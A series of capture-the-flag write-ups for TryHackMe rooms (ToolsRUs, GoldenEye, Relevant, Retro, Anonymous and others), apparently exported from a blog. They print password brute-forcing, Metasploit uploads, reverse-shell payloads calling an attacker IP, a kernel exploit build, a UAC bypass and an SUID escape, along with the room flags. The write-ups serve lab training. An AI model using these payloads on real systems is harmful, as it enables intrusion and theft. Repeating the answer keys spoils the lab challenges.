“exporttopdf” and send it to the Repeater\nIn the Repeater, we modify the URL parameter to point to the local loopback address.\nChanging the URL with the internal ip: http://127.0.0.1/internal/admin.php\nAnd now we send the request\nTo view the rendered content of the server’s internal response, we use Burp’s “Request in Browser” feature.\nHover your mouse over the response and right clickClick Request in browser → In original sessionCopy the linkNow head to 
the browser and paste the link and reload the page\nSuccess! The page loads, revealing the flag in the document.\nflag{6255c55660e292cf0116c053c9937810}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nFeel free to drop a follow and connect with me on TryHackMe as well:\n\u0026lt;iframe src=”https://tryhackme.com/api/v2/badges/public-profile?userPublicId=3802254\" style=’border:none;’\u0026gt;\u0026lt;/iframe\u0026gt;\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"21 February 2026","externalUrl":null,"permalink":"/writeups/tryhackme/surfer-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"SURFER- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is an easy rated room from the TryHackMe platform titled “OPERATION SLITHER” OPERATION SLITHER- TRY HACK ME- ROOMHello everyone! This is an easy rated room from the TryHackMe platform titled “OPERATION SLITHER”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nTo the game I used to play mid classes to kill timePhase 1: Social Media BreadcrumbingInitial Target IdentificationThe investigation begins with a single identifier: a username.\nI started by copying the initial username and performing an indexed search online.\nThe search results immediately pointed to an active profile on Threads (Answering Task 1).\nAnalyzing Threads for LeaksSocial media platforms are often the primary source of “OPSEC” (Operations Security) failures, especially in comment and reply sections where users may feel less scrutinized\nI scoured the target’s profile\nWithin a specific reply, I identified a suspicious character string.\nRecognizing the character set, I identified it as Base64.\nWe get the next flag:\nTHM{sl1th3ry_tw33tz_4nd_l34ky_r3pl13s!}During this analysis, I identified a secondary high-interest username involved in the conversation:\nmyst1cv1x3nPhase 2: Cross-Platform CorrelationPivoting to InstagramSearching for alternate media accounts for the new handle yielded no direct results.\nHowever, returning to the original Threads profile page revealed an Instagram link in the bio.\nThe Instagram profile contained 4 images and 1 video.\nUpon carefully reviewing the video content, I noticed a link to SoundCloud embedded in the description or visual frames.\nSoundCloud ForensicsWhile scrolling through the target’s SoundCloud profile, I located a hidden Base64 string:\nVEhNe3MwY20xbnRfMDBwczNjX2Yxbmczcl9tMXNjbDFja30=\nWe get the next flag:\nTHM{s0cm1nt_00ps3c_f1ng3r_m1scl1ck}Phase 3: Technical Repository AnalysisFinding the Third UserTo locate the third individual in this network.\nI moved from the content of the SoundCloud profile to the Following/Followers list.\nI identified a user with the handle\nsh4d0wF4NG.GitHub Repository InvestigationTracking this user required deeper digging into developer platforms.\nI performed a global search for the handle, which eventually led me to a GitHub profile.\nThe Path: 
https://github.com/sh4d0wF4NG?tab=repositories\n*Developers often accidentally leak credentials or sensitive configurations in their commit histories or public repositories.*\nCommit HistoryI focused on the repository titled “red team infra”\nI began checking the commits (the history of changes made to the code).\nI looked for keywords associated with the challenge tasks, specifically finding a commit related to “automation”.\nAfter scrolling through the changes in that specific commit, I found the final Base64 string:\nVEhNe3NoNHJwX2Y0bmd6X2wzNGszZF9ibDAwZHlfcHd9\nFinal flag:\nTHM{sh4rp_f4ngz_l34k3d_bl00dy_pw}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nAlso, do follow me on Tryhackme:\nhttps://tryhackme.com/p/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"16 February 2026","externalUrl":null,"permalink":"/writeups/tryhackme/operation-slither-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"OPERATION SLITHER- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is an easy rated room from the TryHackMe platform titled “TOOLSRUS” TOOLSRUS- TRY HACK ME- ROOMHello everyone! This is an easy rated room from the TryHackMe platform titled “TOOLSRUS”\nThis room is classified as easy and is a ctf-type challenge. 
I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nHope the resurrection actually happensPhase 1: Web Enumeration and Information GatheringInitial Landing PageThe investigation begins by visiting the victim’s IP address.\nThe page presents a “ToysRus” theme but contains a specific message:\nVisiting the victim IP, I see a page stating: Unfortunately, ToolsRUs is down for upgrades. Other parts of the website are still functional…\nI manually check robots.txt and the page source code, but neither reveals any immediate points of interest.\nDirectory Brute-Forcing with GobusterSince the main page is a dead end, I use the hint provided by the room to check for hidden subdirectories using a common wordlist.\nI execute a Gobuster scan:\ngobuster dir -u http://10.80.188.137 -w /usr/share/wordlists/dirb/common.txt -t 4The scan identifies several interesting paths:\n/guidelines, /protected, /server-status, and /index.html.Answering the first task, the directory that stands out is guidelines.\nLeaking the UsernameI navigate to the /guidelines directory to see what information it holds. This proves to be a critical pivot point as it contains a message intended for an employee.\nVisiting /guidelines, — I see the following message: { Hey bob, did you update that TomCat server? 
}\nThis answers the second task: the person’s name is bob.\nNavigating to the third task, I check the /protected directory.\nUpon visiting, the browser prompts for Basic Authentication.\nThis answers the third task: the directory is protected.\nPhase 2: Credential Cracking and Service DiscoveryBrute-Forcing with HydraNow that I have a valid username (bob) and a protected directory that requires a password, I use Hydra to perform a dictionary attack using the rockyou wordlist.\nI run the Hydra command:\nhydra -l bob -P /usr/share/wordlists/rockyou.txt.gz -f 10.80.188.137 http-get /protected -VHydra successfully finds the credentials: bob:bubbles.\nThis answers the fourth task: the password is bubbles.\nIdentifying the Secondary Web ServiceUpon entering the credentials to access the /protected page, I see a message stating that the service has been moved to a different port.\nI need to identify which port is hosting the actual Tomcat manager.\nPerforming a comprehensive Nmap scan to find all open ports and versions:\nnmap 10.80.188.137 -sV -sC -vThe scan reveals several open ports: 22 (SSH), 80 (HTTP), 1234, and 8009 (AJP).\nPort 1234 is identified as running Apache Tomcat. This answers the fifth task: the port is 1234.\nFingerprinting the Tomcat ServerI navigate to the service on the newly discovered port to confirm the version and administrative interface.\nVisiting http://10.80.188.137:1234/, the header confirms the version: Apache Tomcat/7.0.88. This answers the sixth task.\nI click on “Server Status” and provide the credentials I cracked earlier (bob:bubbles). 
This allows me to view the internal server status page.\nPhase 3: Vulnerability Assessment and Metasploit ExploitationVulnerability Scanning with NiktoFollowing the room’s hint, I use Nikto to scan the Tomcat manager directory.\nI run Nikto with the authenticated credentials:\nnikto -h http://10.80.188.137:1234/manager/html/ -id bob:bubblesIt finds 5 documents in the directory (answering the seventh task).\nIt identifies the Apache version on port 80 as Apache/2.4.18 (answering the eighth task).\nIt identifies the Apache-Coyote version on port 1234 as 1.1 (answering the ninth task).\nGaining a Root Shell via MetasploitSince I have administrative credentials for the Tomcat Manager, I can use Metasploit to upload a malicious file to gain Remote Code Execution (RCE).\nI launch Metasploit:\nmsfconsoleI search for the Tomcat upload module:\nsearch type:exploit name:tomcatI select the manager upload exploit:\nexploit/multi/http/tomcat_mgr_upload (Option 6).I configure the required parameters:\nset RHOSTS 10.80.188.137set RPORT 1234set HttpUsername bobset HttpPassword bubblesset LHOST \u0026lt;Your Machine IP\u0026gt;I execute the exploit:\nexploitThe exploit successfully uploads the payload and spawns a shell.\nI drop into a system shell \u0026amp; I check my current user :\nshellwhoamiThe command returns root. This answers the tenth task.\nFinal Flag RetrievalNow that I have full administrative control of the system, I navigate to the root directory to claim the final flag.\ncd /rootls -lacat flag.txtAnd we get the final flag:\nff1fc4a81affcc7688cf89ae7dc6e0e1CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nAlso, do follow me on tryhackme: \u0026lt;iframe src=”https://tryhackme.com/api/v2/badges/public-profile?userPublicId=3802254\" style=’border:none;’\u0026gt;\u0026lt;/iframe\u0026gt;\nI also apologize for the delayed post. In one of my recent posts covering a hackthebox room, someone felt I was doing something illegal and ended up reporting me to Medium.\nLuckily, Medium support was really helpful, helped sort out the issues and has given me a green light to resume posting walkthroughs.\nHopefully this doesn’t happen again and people, if there is a problem with my content or any feedback, my comment section is always open.\nPlease do put comments or reach out to me and I’d love to hear feedback and work on things accordingly.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"10 February 2026","externalUrl":null,"permalink":"/writeups/tryhackme/toolsrus-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"TOOLSRUS- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a medium rated room from the TryHackMe platform titled “GOLDEN EYE” GOLDEN EYE- TRY HACK ME- ROOMHello everyone! This is a medium rated room from the TryHackMe platform titled “GOLDEN EYE”\nThis room is classified as medium and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nPhase 1: Initial Reconnaissance and Source Code AnalysisPort Scanning and Web DiscoveryWe begin by loading the victim webpage, which immediately redirects us to /sev-home/ for login.\nConcurrently, we initiate a thorough Nmap scan to identify all open services.\nLoading the victim webpage we see /sev-home/ to loginI start nmap scan on the side: nmap -sC -sV -p- 10.201.78.91 -T 5Port 25 (SMTP), 80 (HTTP), 55006, 55007 are openSource Code Analysis and First CredentialWe inspect the source code of the web page for hidden clues, which leads us to a JavaScript file containing encoded information.\nInspecting the source code I see terminal.jsChecking itboris may be the user and password is encodedAnother user is NatalyaWe extract and decode the highly obfuscated password hash:\nWe see the hash password: \u0026amp;#73;\u0026amp;#110;\u0026amp;#118;\u0026amp;#105;\u0026amp;#110;\u0026amp;#99;\u0026amp;#105;\u0026amp;#98;\u0026amp;#108;\u0026amp;#101;\u0026amp;#72;\u0026amp;#97;\u0026amp;#99;\u0026amp;#107;\u0026amp;#51;\u0026amp;#114;Using dcode cipher identifier I find out the hash is HTMLESCAPEDecoding it I get the password: InvincibleHack3rPhase 2: Exploiting POP3 and Credential CyclingInitial Web Login and POP3 DiscoveryUsing the first set of credentials, we gain access to the web portal and gather a critical clue about a non-default POP3 port.\nUsing the creds → boris:InvincibleHack3rI use it in login http://10.201.54.252/sev-home/We are in!Inspecting the page → we see authorised operators are: Natalya, BorisIn the text it’s mentioned pop3 is on a non-default portWe attempt to connect to the identified non-default POP3 port (55007) but find the password is wrong, indicating the encoded password was outdated.\nNow trying to connect to pop3 server: nc 10.201.78.91 55007Using the creds but the password is wrongCracking Boris’s POP3 PasswordWe pivot to Hydra to brute-force the password for the user boris on the POP3 service.\nUsing hydra:\nhydra -l boris -P 
/usr/share/set/src/fasttrack/wordlist.txt 10.201.78.91 -s 55007 pop3 -t 64We get: secret1! as the passwordWe retry the connection, which is now successful, allowing us to read the mail.\nRetrying connection is successful\nnc 10.201.78.91 55007user borispass secret1!listWe see 3 mails\nretr 1retr 2retr 3Reading the 3 mails we find out about a new user named Xenia and how Natalya can break into our codesCracking Natalya’s POP3 PasswordWe immediately use Hydra to find the credentials for the next operator, Natalya.\nNow trying to enumerate and find Natalya’s creds:hydra -l Natalya -P /usr/share/set/src/fasttrack/wordlist.txt 10.201.78.91 -s 55007 pop3 -t 64We get the password as: birdLogging in as Natalya reveals crucial information about another user and two domain names.\nLet’s login using this now:\nnc 10.201.78.91 55007user Natalyapass birdlistretr 1retr 2Here we see another org user called Janus and Xenia being assigned to her and creds xenia:RCP90rulez!\nDomains revealed:\nsevernaya-station.com/gnocertdir and severnaya-station.com\nHostname Resolution SetupThe discovery of the new domain names necessitates updating our local hostname resolution.\nFor this we need to update it in our /etc/hostsUpdate the detailsPhase 3: Web Application Exploitation (Moodle)Gaining Access to the Moodle SiteWe access the web application at the specified directory using the new xenia credentials.\nNow accessing: http://severnaya-station.com/gnocertdir/ → we come to a landing pageI see the intro to golden eye post and click itit is asking for login → using xenia:RCP90rulez!poking around → Home / ▶ My profile / ▶ Messageswe see a new user: Dr.Dorak and he told his username is doakCracking Dr. 
Dorak’s CredentialsWe perform one final POP3 brute-force attack to find the password for the user doak.\ntrying to see if we can find his pass:hydra -l doak -P /usr/share/set/src/fasttrack/wordlist.txt 10.201.78.91 -s 55007 pop3 -t 64we get doak:goatLogging in as doak reveals yet another, final set of administrative credentials.\nnc 10.201.78.91 55007user doakpass goatlistretr 1Here we find another username and pass\ndr_doak:4England!Admin Access and Reverse Shell SetupUsing the new credentials, we log in as the administrator, find the plugin area, and configure it for remote code execution.\nusing this and logging in: http://severnaya-station.com/gnocertdir/ → {dr_doak:4England!}Home / ▶ My profile / ▶ My private files → s3cret.txt file is thereWe get a clue about something juicy here: /dir007key/for-007.jpgWe visit the new path, where an image is visible, which we then inspect for steganography and metadata.\nVisiting it: http://severnaya-station.com/dir007key/for-007.jpg → we see an image under for JamesI immediately head for steganography, but no luckThen checking metadata by exiftool: exiftool for-007.jpgThen in image description I see: eFdpbnRlcjE5OTV4IQ==I know this is base 64 so decode itWe get: xWinter1995x!This final password gives us true administrative access. 
We log in and navigate to the plugin settings to set up a reverse shell.\nNow let’s use this and login as admin: http://severnaya-station.com/gnocertdir/ → admin:xWinter1995x!\nHome / ▶ Site administration / ▶ Search resultsWe note the path to aspell which indicates where the shell payload should be injected.\nThere is a search options and we see the path to aspellOpen a listener: nc -lvnp 3333And let’s use a payloadWe change the text editor plugin to PSpellShell and save the changes.\ngoing to: Home / ▶ Site administration / ▶ Plugins / ▶ Text editors / ▶ TinyMCE HTML editorchange to PSpellShell → save changesWe inject the reverse shell payload into the aspell dump area.\nIn aspell dump the payload:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.9.2.13\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'To trigger the shell, we simply use the spell check function on a new post.\nnow we need to make a new post to trigger itHome / ▶ My profile / ▶ Blogs / ▶ Add a new entryjust click on ABC (spell check button) → and we catch shellPhase 4: Kernel Privilege EscalationIdentifying Vulnerable Kernel VersionWe retrieve the kernel version, which points to a known public exploit.\nGet kernel version: uname -a → 3.13.0-32-genericNow we go to the exploit.db link given and download the exploitCompiling and Executing the ExploitWe set up a Python server on our attacking machine, download the exploit to the victim’s /tmp directory, and confirm the compiler setting.\nNow this is the crucial part where I got stucknano 37292.c and scroll down completely and ensure it's cc and not gcc (if it's gcc it won't be able to create dynamic library)This is a critical stepSo if it’s gcc change it to cc → save itpython3 -m http.serverBack in the shell:\nBack to the shell tabcd /tmpwget http://10.9.2.13:8000/37292.ccat 37292.cConfirm if it has moved successfully and ensure 
it's cc once againFinally, we compile and run the exploit to achieve root access.\ncc 37292.c -o hack./hackcd /rootcat .flag.txt → 568628e0d993b1973adc718237da6e93568628e0d993b1973adc718237da6e93The challenge confirms the successful completion.\nThen going to webpage: http://severnaya-station.com/006-final/xvf7-flag/ → we see we have successfully come to the end of this challengeCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"25 January 2026","externalUrl":null,"permalink":"/writeups/tryhackme/golden-eye-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"GOLDEN EYE- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a medium rated room from the TryHackMe platform titled “RELEVANT” RELEVANT- TRY HACK ME- ROOMHello everyone! This is a medium rated room from the TryHackMe platform titled “RELEVANT”\nThis room is classified as medium and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nPhase 1: Enumeration and Credential DiscoveryNmap Scan and Service IdentificationWe begin by initiating a comprehensive Nmap scan to identify all open ports and services on the Windows target machine.\nStart with a nmap scan:\nnmap -sC -sV 10.201.15.149 -p- -T 5We see ports open: 80, 135, 139, 445, 3389, 49663, 49666, 49667\nThe open ports immediately highlight Windows communication protocols (135, 139, 445, 3389) and two potential web services (80 and 49663).\nAccessing the website on port 80 shows a default Windows layout, and checking port 49663 shows the same content.\nDiscovering Shared Files via SMBThe presence of ports 139 and 445 (SMB/NetBIOS) is a critical path for enumeration.\nWe check for anonymous or accessible shares using smbclient.\nSince I saw port 139/445 I check it:\nsmbclient -L 10.201.15.149And I see nt4wrksv-Disk\nWe connect to this share, which is found to contain a plaintext file. We download and analyze the file.\nsmbclient \\\\\\\\10.201.15.149\\\\nt4wrksvWe see: passwords.txt\nget passwords.txtexitNow we read the file\ncat passwords.txt:Qm9iIC0gIVBAJCRXMHJEITEyMw== \u0026amp; QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQkWe immediately recognize the base 64 encoding and decode the strings to retrieve two sets of credentials.\nBob — !P@$$W0rD!123Bill — Juw4nnaM4n420696969!$$$Phase 2: Initial Foothold via Web ShellPreparing the Reverse ShellThe SMB share is highly relevant as it appears to be tied to a web service.\nWe use directory scanning to confirm the path structure and prepare an ASPX reverse shell, as the environment is Windows (and therefore likely running IIS).\nNow this is possible by using .aspx files so we use a reverse shell for this\nPort 49663 is Windows RPC and often running IIS server\nSearching directories:\ndirsearch -u http://10.201.15.149:49663/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100We see nt4wrksv again\nWe download, modify, and upload a standard ASPX reverse shell from a github 
repository.\nSo now getting the revshell:\nwget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/refs/heads/master/shell.aspx\nChanging the IP \u0026amp; port\nNow let’s put that back in smb client:\nsmbclient \\\\\\\\10.201.15.149\\\\nt4wrksvput shell.aspxexitTriggering the Web Shell and Retrieving the User FlagWith the shell uploaded, we open a listener and trigger the file via the web path discovered.\nOpen listener:\nnc -lvnp 1234Initially it is:\nNow to trigger it on the web:\nhttp://10.201.82.143:49663/nt4wrksv/shell.aspxWe catch a shell!!\nWe confirm our user and retrieve the first flag.\nwhoami -\u0026gt; dircd Users -\u0026gt; dircd Bob -\u0026gt; dircd Desktop -\u0026gt; dirtype user.txtTHM{fdk4ka34vk346ksxfr21tg789ktf45}Phase 3: Privilege Escalation to SYSTEMIdentifying the Impersonate PrivilegeFor privilege escalation, we check our current user’s security privileges, which reveals a highly exploitable capability.\nNow to escalate privilege\nwhoami /privWe see: SeImpersonatePrivilege → Impersonate a client after authentication → Enabled\nUsing PrintSpooferThe SeImpersonatePrivilege is vulnerable to exploits like PrintSpoofer.\nWe download the binary, upload it via the SMB share, and execute it on the target system.\nGoing up on the web and searching it:\nwget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exeBack in smb client let’s place it:\nput PrintSpoofer64.exeexitWe return to our shell, execute the binary, and confirm the highest level of privilege and back in shell:\ncd /cd inetpub -\u0026gt; cd wwwroot -\u0026gt; cd nt4wrksvdirWe see the .exe file sitting there and now let's execute itPrintSpoofer64.exe -i -c powershell.exewhoami\nThis confirms we are nt authority/system\nFinally, we navigate to the Administrator’s desktop and retrieve the root flag.\ncd /cd Users -\u0026gt; cd Administrator -\u0026gt; cd Desktopdirtype root.txtTHM{1fk5kf469devly1gl320zafgl345pv}CONCLUSION:I hope this write-up walkthrough was 
helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"11 January 2026","externalUrl":null,"permalink":"/writeups/tryhackme/relevant-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"RELEVANT- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a Hard rated room from the TryHackMe platform titled “RETRO” RETRO- TRY HACK ME- ROOMHello everyone! This is a Hard rated room from the TryHackMe platform titled “RETRO”\nThis room is classified as HARD and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nThe Good ol’ Days :(\nPhase 1: Initial Enumeration and Web Foothold\nPort Scanning and Directory Discovery\nWe begin by visiting the main website, which presents the default IIS landing page (the stock Windows web server page).\nI initiate a thorough Nmap scan to identify all open ports and services:\nnmap -sC -sV -Pn 10.201.11.171 -T 5\nPorts 80 (HTTP) and 3389 (RDP) are open.\nThe open port 80 prompts directory enumeration to find hidden web resources:\ngobuster dir -u http://10.201.11.171/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100\nWe discover /retro and /Retro (IIS paths are case-insensitive, so both hits are the same directory).\nGaining WordPress Credentials\nVisiting the subdirectory I see a gaming-themed page called Retro Fanatics.\nScouring through the page I see a login link at the bottom, and it is a WordPress login page.\nLooking through the posts, the main author goes by the name “Wade”.\nInspecting his posts I find a comment under the Ready Player One post containing the hint “parzival”.\nUsing the discovered hint as a password, we successfully log into the WordPress site.\nUsing wade:parzival as credentials I log in to WordPress.\nPhase 2: User Access and Privilege Check\nRDP Login and User Flag Retrieval\nSince we saw port 3389 (RDP) was open, we try the newly discovered WordPress credentials for remote desktop access. Password reuse between a web application and a Windows account is exactly the kind of weakness worth testing first, and it works here:\nxfreerdp3 /u:wade /p:parzival /v:10.201.11.171\nOn the desktop we see user.txt:\n3b99fbdc6d430bfb51c72c651a261927\nOnce in the system as user wade, we check the current privilege level.\nOpen cmd → whoami → shows wade\nNow to escalate privileges:\nwhoami /priv\nWe see: SeChangeNotifyPrivilege → Bypass traverse checking → Enabled\nA caveat here: SeChangeNotifyPrivilege is granted to every account by default and is not an escalation vector by itself, so whoami /priv gives us nothing to exploit. The real path on this box is a known UAC-bypass technique that abuses the certificate dialog of a signed installer, which we reach through a file left in the Recycle Bin below.\nA video walkthrough of these steps:\nhttps://www.youtube.com/watch?v=3BQKpPNlTSo\nPhase 3: Privilege Escalation to Administrator\nFinding the Hidden File\nWe attempt a manual approach to check the Administrator directory, which fails, but leads us to a crucial file in the Recycle Bin.\nChecking File Explorer I try getting into the Administrator folder, but the password is incorrect.\nI open the Recycle Bin, see a file inside it called hhupd (an installer executable), and restore it.\nExploiting the ‘Save Page’ Dialog\nWe run the restored executable, which immediately fails, but its UAC prompt gives us a path to exploit a Windows UI function: anything we can open from that prompt runs in the same elevated context.\nClick on Show more details → Show information about the publisher, and we see a web link. Click on it, but nothing loads, since the machine has no outbound connection.\nWe use the keyboard shortcut Ctrl + S in the non-loading browser window to open the Save As dialog, which is a file browser running with the elevated token.\nNow, before clicking Save, type this manually into the file name field:\nC:\\Windows\\System32\\*.*\nThis lists every file in System32. Scroll down, find cmd.exe, right-click it and choose Open. The resulting command prompt inherits the elevated token:\nwhoami\ncd Users\ncd Administrator\ncd Desktop\ntype root.txt.txt\n7958b569565d7bd88d10c6f22d1c4063\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nWrapping up 2025 with this final write-up — see you in 2026 with more!\nWishing you all a Merry Christmas and a Happy New Year.\n","date":"27 December 2025","externalUrl":null,"permalink":"/writeups/tryhackme/retro-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"RETRO- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a medium rated room from the TryHackMe platform titled “Anonymous”\nANONYMOUS- TRY HACK ME- ROOM\nThis room is classified as medium and is a ctf-type challenge. 
I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nPhase 1: Initial Enumeration and FTP Access\nNmap Scan and Service Identification\nWe begin by initiating an Nmap scan to identify open ports and services on the target machine.\nnmap -sC -sV 10.201.68.115 -T 5\nWe see four ports open: 21 (FTP), 22 (SSH), and 139 and 445 (SMB).\n(The target IP changes between sessions; the commands below were run against a later instance at 10.201.103.96.)\nExploiting Anonymous FTP and File Retrieval\nWe first enumerate the SMB shares and find one that accepts a guest login:\nsmbclient -L 10.201.103.96\nUsing the password anonymous we see a share named pics. We pivot to the FTP service, which commonly accepts the same anonymous credentials:\nftp 10.201.103.96\nLog in as anonymous with the password anonymous, then:\nls -al\nWe see a scripts directory:\ncd scripts\nget clean.sh\nget to_do.txt\nget removed_files.log\nexit\nPhase 2: Initial Foothold via File Manipulation\nReverse Shell Injection and Execution\nReading the retrieved files: clean.sh is a cleanup script and removed_files.log is its output, and the repeated log entries show the script is run on a schedule, most likely by a cron job. Downloading removed_files.log again a minute later and seeing fresh entries confirms it. A scripts directory we can write to, combined with a scheduled script, is our foothold.\nWe inject our reverse shell payload into clean.sh, set up a listener, and upload the modified file back to the server.\nnano clean.sh\nWe replace the contents with the payload:\n#!/bin/bash\nbash -i \u0026gt;\u0026amp; /dev/tcp/\u0026lt;tryhackme-openvpn-ip\u0026gt;/4444 0\u0026gt;\u0026amp;1\nOpen a listener in a new tab:\nnc -lvnp 4444\nNow to place it back, we log in to FTP again:\nftp 10.201.103.96\ncd scripts\nput clean.sh\nexit\nWithin a minute the cron job runs the script and we catch a shell. It runs as whichever user owns the cron entry, not as root, which is why a separate escalation step follows.\nWe use the new shell to retrieve the user flag:\nls -la\ncat user.txt\n90d6f992585815ff991e68748c414740\nPhase 3: Privilege Escalation via SUID Binary\nDiscovering the SUID Binary\nTo escalate privileges, we search for binaries that have the SUID (Set User ID) bit set, allowing a non-root user to execute them with the permissions of the owner (root).\nfind / -user root -perm -u=s 2\u0026gt;/dev/null\nWe see /usr/bin/env, which catches our attention: env is not SUID on a stock install, and its whole job is to execute whatever command it is given.\nRoot Shell Execution\nWe check GTFOBins for the /usr/bin/env entry and find a one-liner that spawns a shell while keeping the effective UID of root:\nenv /bin/sh -p\nThe -p flag matters: without it the shell would notice that its effective and real UIDs differ and drop the privileges. Typing in this single line we get root permissions:\ncd /root\ncat root.txt\n4d930091c31a622a7ed10f27999af363\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"20 December 2025","externalUrl":null,"permalink":"/writeups/tryhackme/anonymous-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"ANONYMOUS- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “PUBLISHER”\nPUBLISHER- TRY HACK ME- ROOM\nThis room is classified as easy and is a boot2root-type challenge. 
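Back to the SUID step of the Anonymous room above: the find, then checking GTFOBins for each hit, is worth automating. The Python below is an added example and not code from the original write-up. It takes the output of that find (a constructed list here, not a real scan) and splits it into GTFOBins-documented shell spawners and binaries that are not part of the stock Ubuntu SUID set. It goes one step beyond the room by also pulling the absolute paths embedded in a custom SUID wrapper, the way strings would, and reporting which of them the current user can write, since a root-run script that a low-privileged user can edit is the same bug in a different shape. The GTFOBins subset, the stock-SUID baseline and the wrapper bytes are assumptions made for the example.

```python
"""Triage of SUID binaries: added example, not code from the original write-up."""
import os
import re

# Subset of GTFOBins entries that spawn a shell when the binary is SUID (assumed list).
GTFOBINS_SUID_SHELL = {"env", "find", "bash", "python3", "python", "vim", "awk", "perl"}

# SUID binaries expected on a stock Ubuntu install (assumed baseline; adjust per distro).
STOCK_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/umount",
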